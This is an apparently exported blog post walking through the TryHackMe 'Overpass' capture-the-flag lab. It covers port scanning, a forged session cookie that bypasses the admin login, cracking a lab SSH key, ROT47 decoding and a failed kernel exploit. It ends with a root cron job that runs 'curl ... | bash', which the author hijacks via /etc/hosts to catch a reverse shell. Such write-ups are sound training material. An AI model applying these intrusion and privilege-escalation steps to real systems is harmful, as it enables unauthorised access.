{"id":130824,"date":"2022-12-25T14:48:39","date_gmt":"2022-12-25T14:48:39","guid":{"rendered":"https:\/\/blog.finxter.com\/?p=1000564"},"modified":"2022-12-25T14:48:39","modified_gmt":"2022-12-25T14:48:39","slug":"how-i-hacked-a-pw-manager-tryhackme-overpass-1","status":"publish","type":"post","link":"https:\/\/sickgaming.net\/blog\/2022\/12\/25\/how-i-hacked-a-pw-manager-tryhackme-overpass-1\/","title":{"rendered":"How I Hacked a PW Manager (TryHackMe Overpass 1)"},"content":{"rendered":"\n<div class=\"kk-star-ratings kksr-auto kksr-align-left kksr-valign-top\" data-payload='{&quot;align&quot;:&quot;left&quot;,&quot;id&quot;:&quot;1000564&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;top&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;1&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;Rate this post&quot;,&quot;legend&quot;:&quot;5\\\/5 - (1 vote)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;{score}\\\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}'>\n<div class=\"kksr-stars\">\n<div class=\"kksr-stars-inactive\">\n<div class=\"kksr-star\" data-star=\"1\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" data-star=\"2\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" data-star=\"3\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" data-star=\"4\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" data-star=\"5\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"kksr-stars-active\" style=\"width: 142.5px;\">\n<div class=\"kksr-star\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<\/div>\n<div class=\"kksr-legend\" style=\"font-size: 19.2px;\"> 5\/5 &#8211; (1 vote) <\/div>\n<\/p><\/div>\n<figure class=\"wp-block-embed-youtube wp-block-embed is-type-video is-provider-youtube\"><a href=\"https:\/\/blog.finxter.com\/tryhackme-overpass-1-compsci-students-creating-a-pw-manager-gone-bad\/\"><img decoding=\"async\" src=\"https:\/\/blog.finxter.com\/wp-content\/plugins\/wp-youtube-lyte\/lyteCache.php?origThumbUrl=%2F%2Fi.ytimg.com%2Fvi%2FWqslUEU7p94%2Fhqdefault.jpg\" alt=\"YouTube Video\"><\/a><figcaption><\/figcaption><\/figure>\n<h2>PREMISE<\/h2>\n<p>The premise of the box is that a group of computer science students has created a password encryption\/decryption tool. <\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"425\" height=\"637\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2022\/12\/image-320.png\" alt=\"\" class=\"wp-image-1000659\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2022\/12\/image-320.png 425w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2022\/12\/image-320-200x300.png 200w\" sizes=\"auto, (max-width: 425px) 100vw, 425px\" \/><figcaption class=\"wp-element-caption\"><strong>Target<\/strong>: <em>One of the CS students posing on a party<\/em> <img decoding=\"async\" src=\"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/1f609.png\" alt=\"\ud83d\ude09\" class=\"wp-smiley\" style=\"height: 1em; max-height: 1em;\" \/><\/figcaption><\/figure>\n<\/div>\n<pre class=\"wp-block-preformatted\"><img decoding=\"async\" src=\"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/1f449.png\" alt=\"\ud83d\udc49\" class=\"wp-smiley\" style=\"height: 1em; max-height: 1em;\" \/> <em>\"What happens when a group of broke Computer Science students try to make a password manager? Obviously a perfect commercial success!\"<\/em> <\/pre>\n<p>We are tasked with hacking our way into their server as the root user. <\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"956\" height=\"637\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2022\/12\/image-323.png\" alt=\"\" class=\"wp-image-1000671\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2022\/12\/image-323.png 956w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2022\/12\/image-323-300x200.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2022\/12\/image-323-768x512.png 768w\" sizes=\"auto, (max-width: 956px) 100vw, 956px\" \/><figcaption class=\"wp-element-caption\"><strong>Attacker<\/strong>: <em>A sophisticated hacker &#8211; not who you may expect.<\/em><\/figcaption><\/figure>\n<\/div>\n<p>This capture-the-flag challenge on TryHackMe involves cookie creation and file spoofing in order to escalate privileges to the root user. It is rated as an easy box. If you don\u2019t like spoilers, I\u2019d recommend trying this <a href=\"https:\/\/tryhackme.com\/room\/overpass\" target=\"_blank\" rel=\"noreferrer noopener\">free hacking challenge <\/a>first before reading any further.<\/p>\n<p>This box is the first in a three-part series. In part two, we will be doing some basic forensics after a cyber attack hits the overpass server. <\/p>\n<p>And in part three we will prove to the Overpass developers that they need to make some security upgrades to their server hosting.<\/p>\n<p>First, let\u2019s record our IPs and get them ready to export as Linux variables.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">export targetIP=10.10.179.249\nexport myIP=10.6.2.23<\/pre>\n<h2>ENUMERATION<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"850\" height=\"637\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2022\/12\/image-322.png\" alt=\"\" class=\"wp-image-1000667\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2022\/12\/image-322.png 850w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2022\/12\/image-322-300x225.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2022\/12\/image-322-768x576.png 768w\" sizes=\"auto, (max-width: 850px) 100vw, 850px\" \/><\/figure>\n<\/div>\n<p>A simple <code>nmap<\/code> scan shows the following results:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">\u250c\u2500[kalisurfer@parrot]\u2500[~\/THM\/overpass-walkthrough]\n\u2514\u2500\u2500\u257c $sudo nmap $targetIP\n[sudo] password for kalisurfer:\nStarting Nmap 7.92 ( https:\/\/nmap.org ) at 2022-12-21 06:01 EST\nNmap scan report for 10.10.179.249\nHost is up (0.087s latency).\nNot shown: 998 closed tcp ports (reset)\nPORT STATE SERVICE\n22\/tcp open ssh\n80\/tcp open http Nmap done: 1 IP address (1 host up) scanned in 8.44 seconds\n---\n<\/pre>\n<p>Nothing is surprising here. These are the standard ports for HTTP web applications and <code>ssh<\/code> services.\u00a0<\/p>\n<p>Next, we\u2019ll run a <code>dirb<\/code> scan to do some directory sniffing. Our <code>dirb<\/code> scan results reveal a few interesting HTML directories. We\u2019ll take a closer look into each of these leads.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">\/admin\n\/aboutus\n\/css\n\/downloads<\/pre>\n<p>We find the plaintext sourcecode in the <code>\/downloads<\/code> folder! <\/p>\n<p>This will almost certainly be worth looking at closely for more information about the encryption mechanism. Posting the sourcecode is the first of several horrible decisions the Overpass dev team has made with their password storage program. <\/p>\n<p>Some of the takeaways from examining the source code are:<\/p>\n<ol>\n<li>The encryption method used is a <a href=\"https:\/\/blog.finxter.com\/caesar-cipher-in-python\/\" data-type=\"post\" data-id=\"356186\" target=\"_blank\" rel=\"noreferrer noopener\">caesar cypher<\/a> with a rotation of 47. There is a link in the sourcecode pointing to: <a href=\"https:\/\/socketloop.com\/tutorials\/golang-rotate-47-caesar-cipher-by-47-characters-example\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/socketloop.com\/tutorials\/golang-rotate-47-caesar-cipher-by-47-characters-example<\/a><\/li>\n<li>Encrypted passwords are saved locally in a hidden file <code>.passlist<\/code> in the root directory. This will probably be are method for retrieving the root password after we gain an initial foothold into the system.<\/li>\n<li>This encryption (ROT47) is invertible, which means to decrypt a password all we have to do is run the ROT47 cipher code a second time.<\/li>\n<\/ol>\n<p>There is also an executable file for each operating system of the password storage tool. Download and running the program <code>overpassLinux<\/code> shows that we can retrieve passwords as long as there is a <code>.overpass<\/code> hidden file in the <code>\/root<\/code> directory.<\/p>\n<h2>INITIAL FOOTHOLD VIA COOKIE CREATION<\/h2>\n<p>We find a login portal at <code>$targetIP\/admin<\/code>. <\/p>\n<p>First, we inspect the login with <code>burpsuite<\/code> and carefully examine the response to an unsuccessful <code>username:password<\/code>, noticing that the user is rerouted to <code>\/admin<\/code> after an unsuccessful login attempt. <\/p>\n<p>Instead of wasting time attempting to <code>bruteforce<\/code> our way in with a wordlist, we use firefox in developer mode and discover that there are no stored cookies. If we create a new cookie with the name SessionToken, and a reroute path of \u201c<code>\/<\/code>\u201d we find a hidden encrypted <code>ssh<\/code> key. Voila!<\/p>\n<pre class=\"wp-block-preformatted\"><code>Since you keep forgetting your password, James, I've set up SSH keys for you. If you forget the password for this, crack it yourself. I'm tired of fixing stuff for you.\nAlso, we really need to talk about this \"Military Grade\" encryption. - Paradox -----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\nDEK-Info: AES-128-CBC,9F85D92F34F42626F13A7493AB48F337 LNu5wQBBz7pKZ3cc4TWlxIUuD\/opJi1DVpPa06pwiHHhe8Zjw3\/v+xnmtS3O+qiN\nJHnLS8oUVR6Smosw4pqLGcP3AwKvrzDWtw2ycO7mNdNszwLp3uto7ENdTIbzvJal\n73\/eUN9kYF0ua9rZC6mwoI2iG6sdlNL4ZqsYY7rrvDxeCZJkgzQGzkB9wKgw1ljT\nWDyy8qncljugOIf8QrHoo30Gv+dAMfipTSR43FGBZ\/Hha4jDykUXP0PvuFyTbVdv\nBMXmr3xuKkB6I6k\/jLjqWcLrhPWS0qRJ718G\/u8cqYX3oJmM0Oo3jgoXYXxewGSZ\nAL5bLQFhZJNGoZ+N5nHOll1OBl1tmsUIRwYK7wT\/9kvUiL3rhkBURhVIbj2qiHxR\n3KwmS4Dm4AOtoPTIAmVyaKmCWopf6le1+wzZ\/UprNCAgeGTlZKX\/joruW7ZJuAUf\nABbRLLwFVPMgahrBp6vRfNECSxztbFmXPoVwvWRQ98Z+p8MiOoReb7Jfusy6GvZk\nVfW2gpmkAr8yDQynUukoWexPeDHWiSlg1kRJKrQP7GCupvW\/r\/Yc1RmNTfzT5eeR\nOkUOTMqmd3Lj07yELyavlBHrz5FJvzPM3rimRwEsl8GH111D4L5rAKVcusdFcg8P\n9BQukWbzVZHbaQtAGVGy0FKJv1WhA+pjTLqwU+c15WF7ENb3Dm5qdUoSSlPzRjze\neaPG5O4U9Fq0ZaYPkMlyJCzRVp43De4KKkyO5FQ+xSxce3FW0b63+8REgYirOGcZ\n4TBApY+uz34JXe8jElhrKV9xw\/7zG2LokKMnljG2YFIApr99nZFVZs1XOFCCkcM8\nGFheoT4yFwrXhU1fjQjW\/cR0kbhOv7RfV5x7L36x3ZuCfBdlWkt\/h2M5nowjcbYn\nexxOuOdqdazTjrXOyRNyOtYF9WPLhLRHapBAkXzvNSOERB3TJca8ydbKsyasdCGy\nAIPX52bioBlDhg8DmPApR1C1zRYwT1LEFKt7KKAaogbw3G5raSzB54MQpX6WL+wk\n6p7\/wOX6WMo1MlkF95M3C7dxPFEspLHfpBxf2qys9MqBsd0rLkXoYR6gpbGbAW58\ndPm51MekHD+WeP8oTYGI4PVCS\/WF+U90Gty0UmgyI9qfxMVIu1BcmJhzh8gdtT0i\nn0Lz5pKY+rLxdUaAA9KVwFsdiXnXjHEE1UwnDqqrvgBuvX6Nux+hfgXi9Bsy68qT\n8HiUKTEsukcv\/IYHK1s+Uw\/H5AWtJsFmWQs3bw+Y4iw+YLZomXA4E7yxPXyfWm4K\n4FMg3ng0e4\/7HRYJSaXLQOKeNwcf\/LW5dipO7DmBjVLsC8eyJ8ujeutP\/GcA5l6z\nylqilOgj4+yiS813kNTjCJOwKRsXg2jKbnRa8b7dSRz7aDZVLpJnEy9bhn6a7WtS\n49TxToi53ZB14+ougkL4svJyYYIRuQjrUmierXAdmbYF9wimhmLfelrMcofOHRW2\n+hL1kHlTtJZU8Zj2Y2Y3hd6yRNJcIgCDrmLbn9C5M0d7g0h2BlFaJIZOYDS6J6Yk\n2cWk\/Mln7+OhAApAvDBKVM7\/LGR9\/sVPceEos6HTfBXbmsiV+eoFzUtujtymv8U7\n-----END RSA PRIVATE KEY-----\n<\/code><\/pre>\n<p>It looks like our initial foothold will be as the user <code>james<\/code>. Let\u2019s pause for a moment to collect our thoughts and plan out the next steps in our attack.<\/p>\n<h2>RETRIEVING THE PASSCODE FOR THE ENCRYPTED SSH FILE<\/h2>\n<p>This is our plan going forward to retrieve the passcode for the encrypted ssh file:<\/p>\n<ol>\n<li>Save the <code>ssh<\/code> key string as a new file (without the header and footer).<\/li>\n<li>Use <code>ssh2john<\/code> to prep the hash for john the ripper.<\/li>\n<li>Use john to crack that hash and find key our <code>ssh<\/code> keyfile passcode<\/li>\n<\/ol>\n<h2>SSHing INTO USER JAMES<\/h2>\n<p>With the following command, we can now log in as <code>james<\/code> with our trusty ssh passcode and ssh keyfile. The <code>user.txt<\/code> flag is right there in James\u2019 home folder.<\/p>\n<pre class=\"wp-block-preformatted\"><code>!!!\nThm{65c 6bf7}\n!!!<\/code>\n<\/pre>\n<h2>USING OVERPASSLINUX TO RETRIEVE THE USER PASSWORD<\/h2>\n<p>Now that we are in as user James, we can run the overpass program again on the encoded string (<code>,LQ?2> \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 8A:4EFC6QN<\/code>.)<\/p>\n<p>We hit a small snag, seeing that user James doesn\u2019t have proper permissions to run <code>overpassLinux<\/code> on target machine. Using SCP we can copy James\u2019 <code>.overpass<\/code> file to our attack machine. Running overpassLinux on our machine, we can now recover James\u2019 account password.\u00a0<\/p>\n<p>I decided to use <code>python3<\/code> to create a rot47 encryption\/decryption script. A quick google search brought up the following script:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">def rot47(s): x = [] for i in range(len(s)): j = ord(s[i]) if j >= 33 and j &lt;= 126: x.append(chr(33 + ((j + 14) % 94))) else: x.append(s[i]) return ''.join(x) s=\",LQ?2> 8A:4EFC6QN.\"\nprint(rot47(s))\n<\/pre>\n<p>Using nano to edit the script, I added a few tweaks to make it run smoothly on my machine and decrypt James\u2019 password.&nbsp;<\/p>\n<pre class=\"wp-block-preformatted\"><code>[{\"name\":\"System\",\"pass\":\" \"}]\n!!! (james password)<\/code>\n<\/pre>\n<h2>FURTHER ENUMERATION FOR POTENTIAL ATTACK VECTORS<\/h2>\n<p>First, I explored whether or not there are <code>setuid<\/code> bins that user james can run on the system with the following command:<\/p>\n<pre class=\"wp-block-preformatted\"><code>james@overpass-prod:~$ find \/bin -perm -4000 \u2014\n\/bin\/fusermount\n\/bin\/umount\n\/bin\/su\n\/bin\/mount\n\/bin\/ping\n\u2014\n<\/code><\/pre>\n<p>Looking each of these bins up on <code>gtfobins<\/code> showed that there aren\u2019t any clear paths forward yet\u2026<\/p>\n<p>Checking the kernel on <a href=\"https:\/\/www.exploit-db.com\/\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/www.exploit-db.com\/<\/a> showed a potential lead &#8211; a kernel exploit found on target machine! (<a href=\"https:\/\/www.exploit-db.com\/exploits\/47163\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/www.exploit-db.com\/exploits\/47163<\/a> (CVE-2019-13272)). <\/p>\n<p>However, after compiling the exploit and running it on the target machine, the exploit failed saying that this machine is not vulnerable.\u00a0<\/p>\n<pre class=\"wp-block-preformatted\"><code>Linux 4.10 &lt; 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)\n[.] Checking environment ...\n[!] Warning: Could not find active PolKit agent\n[.] Searching for known helpers ...\n[.] Searching for useful helpers ...\n[.] Ignoring blacklisted helper: \/usr\/lib\/update-notifier\/package-system-locked\n<\/code><\/pre>\n<p>Running the attack with Metasploit using the <code>PTRACE_TRACEME<\/code> module also failed, confirming my hunch that this isn\u2019t a viable attack vector.\u00a0<\/p>\n<h2>FINDING A VIABLE ATTACK VECTOR FOR PRIVILEGE ESCALATION<\/h2>\n<p>Next, we check the crontab on the target machine for any automated programs set to run regularly:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">cat \/etc\/crontab<\/pre>\n<p>And bingo! We found a viable escalation path -!!!&nbsp;<\/p>\n<p>The following output shows that <code>buildscript.sh<\/code> is set to run<em> as root<\/em> every minute as a <code>curl<\/code> command from <code>overpass.thm\/downloads\/src\/<\/code>.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\"> * * * * root curl overpass.thm\/downloads\/src\/buildscript.sh | bash\n<\/pre>\n<p>Here is our plan going forward to exploit this system misconfiguration:<\/p>\n<ol>\n<li>First, change the <code>\/etc\/hosts<\/code> file on our target machine to hijack the <code>overpass.thm<\/code> domain by rerouting it to our attack machine\u2019s IP<\/li>\n<li>Use <em><strong>revshells.com<\/strong><\/em> to create a reverse shell payload to our netcat listener<\/li>\n<li>Create a spoof of <code>buildscript.sh<\/code> with the malicious payload and locate it at <code>$myIP:\/downloads\/src\/buildscript.sh<\/code><\/li>\n<li>Spin up a simple HTTP server on port 80 from our attack machine, serving up the spoofed file in the correct directory (<code>\/downloads\/src\/<\/code>)<\/li>\n<li>Boot up a Netcat listener on the port we specified in the <code><a href=\"https:\/\/blog.finxter.com\/tryhackme-alfred-how-i-solved-the-challenge\/\" data-type=\"post\" data-id=\"1000191\" target=\"_blank\" rel=\"noreferrer noopener\">revshell<\/a><\/code> payload.<\/li>\n<li>Wait for a maximum of 60 seconds to catch the reverse shell as root!<\/li>\n<\/ol>\n<pre class=\"wp-block-preformatted\"><code>\u00a0Thm{7f33 53bb}<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>5\/5 &#8211; (1 vote) PREMISE The premise of the box is that a group of computer science students has created a password encryption\/decryption tool. Target: One of the CS students posing on a party &#8220;What happens when a group of broke Computer Science students try to make a password manager? Obviously a perfect commercial success!&#8221; [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[857],"tags":[73,468,528],"class_list":["post-130824","post","type-post","status-publish","format-standard","hentry","category-python-tut","tag-programming","tag-python","tag-tutorial"],"_links":{"self":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/posts\/130824","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/comments?post=130824"}],"version-history":[{"count":0,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/posts\/130824\/revisions"}],"wp:attachment":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/media?parent=130824"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/categories?post=130824"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/tags?post=130824"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}